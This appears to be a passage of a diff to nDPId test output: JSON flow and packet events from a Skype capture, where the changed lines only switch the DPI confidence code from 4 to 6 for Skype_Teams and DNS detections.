-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4pYYAAEARPZvAqAEinTc4kjLdgQkAJLU7nG4Cyw+0E3ewR9IGP0eBLCPkEu6cvusCSULx8g=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2L4AAEARJivAqAEib91KHDLdnE4ALJRcnHACG8tsqKlSc3O3hWaMTNmN0BY4DMi8SBQzDHozUa6r8phn"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLY\/4AAEARkzDAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLbZEAAEARiZ3AqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAAygKMAAEARGILAqAEinTeClDLdnFMAHuO+nHICw5e0uFvnoh7r2z7q0Ash9G6vuA=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA37XsAAEAR+hLAqAEinTg0JTLdnGAAI2eBnHQCCWFRyRLVPOTLcRjYZLb3DOT1DUSOmuDR"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1052,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1nZ0AAEARXdnAqAEib91NmjLdnFEAIcopnHYCxd71ZoU+BTO6L2LN9kiyomjWgPGl4A=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA16v8AAEARrgrAqAEinTeCrDLdnFMAIRT0nHgCu2bzH4JB7obGwPAa3nMCpmcjtPyNNg=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 